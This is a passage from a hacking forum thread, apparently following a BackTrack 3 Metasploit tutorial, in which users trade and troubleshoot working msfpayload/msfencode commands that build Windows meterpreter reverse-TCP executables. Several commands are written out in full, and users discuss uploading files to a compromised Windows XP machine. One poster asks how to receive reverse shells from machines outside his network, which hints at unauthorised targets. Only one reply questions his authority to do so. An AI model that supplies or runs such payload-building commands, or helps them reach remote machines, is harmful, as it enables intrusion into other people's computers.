Page 2 of 9 FirstFirst 1234 ... LastLast

Thread: Metasploiting for BT3 - Reverse TCP

Yeah, dunno if I mentioned that at the start or not, but it is aimed at those who haven't really used it yet, so that they've got something to start learning off of quickly (which I struggled to find when I was starting with it).

Edit: My apologies - sorry if that seemed harsh or anything; I simply meant it in an informing way. I'm still thankful for your comment

~phoenix910

thanks alot. really informative. great for people who are new to metasploit. appreciate it.

Absolutely no trouble at all

~phoenix910

coool

nice thanx

but i'm test this code nothing happend
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe
    show me error
    Code:
    [-] Invalid format: exe
    version MSF 3.2 and update seam problem can tell me what I can slove this problem

That command is fine, so there is no issue with that. What OS are you on? I'd advise redownloading the tar file of Metasploit, extracting that in a new directory, and trying again.

~phoenix910

this is the command i use
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=71.197.199.11,LPORT=100 R | ./msfencode -t exe > output.exe

./msfpayload windows/meterpreter/reverse_tcp LHOST=71.197.199.11 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

Use that instead - and make sure you keep the LPORT as one of the higher ports.

~phoenix910

i have a problem, if someone could please help me, first if i try to upload a file i get this error message:

eterpreter > upload /root/autoexec.bat C:\\AUTOEXEC.BAT[*] uploading : /root/autoexec.bat -> C:\AUTOEXEC.BAT
    [-] core_channel_open: Operation failed: 3

Thats the firs problem if somebody can help me with?

The second problem is when i make a exe file with command:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

sometimes the exe file dosent even connect back, and then sometimes connects back, and i made the same thing evrytime, yes i wrote high number ports and i used the correct LHOST.
    Example1:

I make file test.exe
    Upload it to 192.168.1.2(windows xp sp 3.0)
    It doesnt connect back
    I make file test1.exe, with just the same settings
    Upload it to 192.168.1.2
    It connects back

Example2:
    Make file test.exe
    Upload to 192.168.1.2(windows xp sp 3.0)
    Connects back
    Then i disconnect
    on machine 192.168.1.2 (its not in the task manager anymore)
    i open test.exe after some time, and now doesnt connect back anymore(i didnt change anything in this time)?

Iam running BT3 final

I thing thats really strange, anybody have any idea what could be that?

Tr00G33k

lil-hard

Default I have a problem

Hello every one,

Thanks phoenix910 for the amazing tutorial, everything i have red in the tutorial seems to work fine in the local network, but in external networks i have found my self blocked, because of the router, i'll explain this to you to understand well my probleme:

i have a wireless acces to the internet behind a router, we are too many in this case ,in the same building about 70 users behind the same router, so, when i want to use "Metasploit to bypass corporate firewalls by creating the output.exe file and using the reverse_tcp exploit" i can't give the ip adresse of my computer cuz i have a local ip adrese 192.168.1.*** and i can't detect any reverse connection to my computer with this local ip adresse if some one had executed the output.exe outside the local network, the problem is that i don't have access "password and login" to the router to configure it to redirect incoming connection to my local ip adresse, so i wonder if any one up here can help me to solve this problem. plz

Quote Originally Posted by lil-hard View Post
    Hello every one,

Thanks phoenix910 for the amazing tutorial, everything i have red in the tutorial seems to work fine in the local network, but in external networks i have found my self blocked, because of the router, i'll explain this to you to understand well my probleme:

i have a wireless acces to the internet behind a router, we are too many in this case ,in the same building about 70 users behind the same router, so, when i want to use "Metasploit to bypass corporate firewalls by creating the output.exe file and using the reverse_tcp exploit" i can't give the ip adresse of my computer cuz i have a local ip adrese 192.168.1.*** and i can't detect any reverse connection to my computer with this local ip adresse if some one had executed the output.exe outside the local network, the problem is that i don't have access "password and login" to the router to configure it to redirect incoming connection to my local ip adresse, so i wonder if any one up here can help me to solve this problem. plz
    The problem is obvious, but if you do not have the login credentials to the router you most likely have no business messing around on the network either.
    -Monkeys are like nature's humans.

Page 2 of 9 FirstFirst 1234 ... LastLast